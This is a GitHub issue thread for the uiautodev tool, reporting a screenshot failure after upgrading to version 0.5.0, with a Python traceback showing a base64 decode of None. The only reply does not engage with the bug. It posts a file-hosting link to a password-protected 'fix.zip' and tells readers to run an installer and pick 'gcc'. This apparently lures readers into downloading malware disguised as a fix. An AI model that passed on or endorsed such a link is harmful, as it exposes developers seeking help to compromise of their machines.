### ISSUE TITLE
升级到 0.5.0版本之后发生错误

### ISSUE THREAD

**Issue by nnnio1234** [codeskyblue/uiautodev#20]
INFO:     127.0.0.1:51549 - "OPTIONS /api/android/127.0.0.1%3A16736/screenshot/0?_t=1724682215720 HTTP/1.1" 200 OK
screenshot failed
Traceback (most recent call last):
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\site-packages\uiautodev\router\device.py", line 61, in _screenshot
    pil_img = driver.screenshot(id).convert("RGB")
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\site-packages\uiautodev\driver\android.py", line 38, in screenshot
    return self.ud.screenshot()
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\site-packages\uiautomator2\__init__.py", line 260, in screenshot
    jpg_raw = base64.b64decode(base64_data)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\base64.py", line 80, in b64decode
    s = _bytes_from_decode_data(s)
  File "C:\Users\Administrator\AppData\Local\Programs\Python\Python38-32\lib\base64.py", line 45, in _bytes_from_decode_data
    raise TypeError("argument should be a bytes-like object or ASCII "
TypeError: argument should be a bytes-like object or ASCII string, not 'NoneType'
INFO:     127.0.0.1:51549 - "GET /api/android/127.0.0.1%3A16736/screenshot/0?_t=1724682215720 HTTP/1.1" 500 Internal Server Error
INFO:     127.0.0.1:51529 - "GET /api/android/127.0.0.1%3A16736/hierarchy HTTP/1.1" 200 OK

**Comment by luozhengdong** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
